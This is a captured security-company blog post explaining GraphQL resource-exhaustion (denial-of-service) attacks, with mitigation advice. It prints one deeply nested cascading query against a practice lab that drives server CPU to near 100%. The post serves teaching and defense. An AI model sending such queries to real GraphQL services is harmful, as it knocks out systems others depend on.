payatu.com
Open in
urlscan Pro
188.114.97.10
Public Scan
URL:
https://payatu.com/blog/manmeet/graphql-exploitation-part-4
Submission: On May 10 via api from US — Scanned from DE
Submission: On May 10 via api from US — Scanned from DE
Form analysis 1 forms found in the DOM
<form novalidate="" class="news-letter-form ng-untouched ng-pristine ng-valid"><input type="textbox" name="emailTextBox" placeholder="Your E-Mail Address" class="subscribe-email ng-untouched ng-pristine ng-valid"><button class="subscribe-button"
disabled="">SUBSCRIBE</button></form>Text Content
Services Products Who we are Resources Contact Us We are Hiring
⌂Home › ☷All Blogs › ✍manmeet ›
Graphql Exploitation - Part 4- Resource Exhaustion (DOS)
manmeet31-August-2021
GRAPHQL EXPLOITATION - PART 4- RESOURCE EXHAUSTION (DOS)
We have finally reached the last part of the GraphQL exploitation series. If you
are visiting this blog without going through previous parts, we recommend you to
go through other parts as well.
In this blog, we will go through another possible vulnerability on GraphQL
Server in which GraphQL could be vulnerable to resource exhaustion. Because the
client has control over the amount of data requested, it can issue a GraphQL
request to a query that causes resource exhaustion on the storage used by the
GraphQL server, as well as on the GraphQL server for data serialisation to JSON.
This vulnerability not only can affect Query operation, but it can also happen
using mutation and subscription operations. When a large amount of data is sent
in the parameters in mutation operation, it can cause a high level of CPU
utilization at the server end to process it. When we register a large number of
subscribers or send a large amount of data in the parameters using subscription
then it can also trigger a high amount of CPU utilization.
To demonstrate this we will try the same lab which can be found here. In this
application there is a link between Dogs and Veterinary and vice versa, so,
cascading calls might be made, producing resource depletion at the SQL level on
the database.
Let’s formulate a big cascading Query like this.
query dos {
allDogs(onlyFree: false, limit: 1000000) {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
}
}
}
}
}
}
}
}
}
}
}
}
When we send this query to the server. The server starts using almost 100% of
the CPU as shown below.
Remember to exploit query operation one must find a relation between two
elements of database schema like here Dogs and Veterinary were related both
ways.
MITIGATION
FOR QUERY
The GraphQL developer needs to know about the security strategies to avoid such
exploitation on any type of operator. One can find such steps briefly in this
blog. Use the built-in protection offered for Maximum Query Depth & Query
Complexity, depending on the GraphQL server implementation chosen.
FOR MUTATION/SUBSCRIPTION:
* To limit the size of the incoming accepted data, use input validation.
* Limit the number of subscribers at the code level.
REFERENCES
* https://github.com/righettod/poc-graphql
* https://www.howtographql.com/advanced/4-security/
ABOUT PAYATU
> Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting
> company specializing in security assessments of IoT product ecosystem, Web
> application & Network with a proven track record of securing applications and
> infrastructure for customers across 20+ countries.
Get in touch with us. Click on the get started button below.
Get to know more about our process, methodology & team!
Get started today
☷All Blogs › ✍Latest Blogs
gagan.aggarwal
28-April-2022
Transition to a Safer Card Industry with PCI DSS v4.0 - A Summary Report by
Payatu
On its journey to actively updating compliance standards to tackle modern-day
cyber security threats to the Payment Card Industry, the PCI SSC (Payment Card
Industry Security Standards Council) has up
amit
27-April-2022
5 Myths About Mobile Security and Their Realities
Today smartphones have become one of the most significant aspects of our lives,
omnipresent even! In today’s era smartphones are rapidly replacing computers in
the sense that most tasks can easily b
anubhav.singh
31-March-2022
How can Hackers Analyze the Attacks on OAuth 2.0?
In this article, we will learn about the most common security vulnerabilities
encountered in applications that use the OAuth protocol. The protocol itself is
reliable but it relies heavily on the web
☷All News › ⚑Latest News
Webinar, Online 2022-04-29 00:47:52Z
Amit prajapat will be delivering a webinar on “Gaining Access to Protected
Components In Android”.
Talk, Online 2022-04-25 04:41:28Z
Yashodhan Mandke will be giving a talk on “IoT Security - Att(ack)ing I2C.”
Webinar, Online 2022-04-08 09:47:42Z
Yashodhan Mandke and Appar Thusoo delivered a talk on “Introduction to IoT
Hardware Hacking.”
Subscribe to Our Newsletter
SUBSCRIBE
or
FOLLOW OUR SOCIAL MEDIA HANDLES
Research Powered Cybersecurity Services and Training. Eliminate security threats
through our innovative and extensive security assessments.
Subscribe to our newsletter
Services
IoT Security TestingRed Team AssessmentProduct SecurityAI/ML Security AuditWeb
Security TestingMobile Security TestingDevSecOps ConsultingCode ReviewCloud
SecurityCritical Infrastructure
Products
EXPLIoTCloudFuzz
Conference
NullconHardwear.io
Resources
BlogE-BookAdvisoryMediaCase StudiesMasterClass SeriesSecurecode.wiki
About
About UsCareerNewsContact UsPayatu BanditsHardware-LabDisclosure Policy
All rights reserverved © 2021 Payatu